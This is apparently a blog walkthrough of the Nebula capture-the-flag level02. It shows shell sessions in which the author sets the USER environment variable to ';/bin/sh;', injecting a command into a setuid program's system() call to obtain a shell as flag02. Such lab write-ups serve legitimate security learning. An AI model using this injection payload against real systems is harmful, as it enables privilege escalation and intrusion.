We start off with understanding what is being asked of us:
We start by SSH'ing in as level02 and checking out the /home/flag02 directory:
level02@nebula:~$ cd /home/flag02/ level02@nebula:/home/flag02$ ls -lah total 13K drwxr-x--- 2 flag02 level02 80 2011-11-20 21:22 . drwxr-xr-x 1 root root 100 2012-08-27 07:18 .. -rw-r--r-- 1 flag02 flag02 220 2011-05-18 02:54 .bash_logout -rw-r--r-- 1 flag02 flag02 3.3K 2011-05-18 02:54 .bashrc -rwsr-x--- 1 flag02 level02 7.3K 2011-11-20 21:22 flag02 -rw-r--r-- 1 flag02 flag02 675 2011-05-18 02:54 .profile level02@nebula:/home/flag02$
We examine the code and run the flag02 file:
level02@nebula:/home/flag02$ ./flag02 about to call system("/bin/echo level02 is cool") level02 is cool level02@nebula:/home/flag02$
As expected, the file echo's the current user and says that we are cool :)
However, just like in level01, there is still some issues in this code. The programmer did not consider any malicious user input.
In this example, asprintf is calling the "USER" getenv. Let's see what is currently located in there:
level02@nebula:/home/flag02$ echo $USER level02 level02@nebula:/home/flag02$
As you can see, this is "level02". What happens if we update it to something else? Say, "geoda" for example:
level02@nebula:/home/flag02$ export USER=geoda level02@nebula:/home/flag02$ echo $USER geoda level02@nebula:/home/flag02$ ./flag02 about to call system("/bin/echo geoda is cool") geoda is cool level02@nebula:/home/flag02$
As expected, we have updated the $USER variable to "geoda" instead of the current user "level02". When we run the file, it will print "geoda" instead.
Now, how do we exploit this further?
Well, looking at the program, we can actually "close" the code with the semi colon and run a system shell.
To do this, we update our $USER variable with the following ";/bin/sh;":
level02@nebula:/home/flag02$ echo $USER geoda level02@nebula:/home/flag02$ export USER=";/bin/sh;" level02@nebula:/home/flag02$ echo $USER ;/bin/sh; level02@nebula:/home/flag02$
Now, when we execute ./flag, it will echo ";/bin/sh;" but additionally, instead of saying ";/bin/sh; is cool", it will actually close that statement with our first semi colon and execute /bin/sh:
level02@nebula:/home/flag02$ ./flag02 about to call system("/bin/echo ;/bin/sh; is cool") sh-4.2$ id uid=997(flag02) gid=1003(level02) groups=997(flag02),1003(level02) sh-4.2$ getflag You have successfully executed getflag on a target account sh-4.2$
Excellent!
The next post will be level03.
Thanks for reading!
-geoda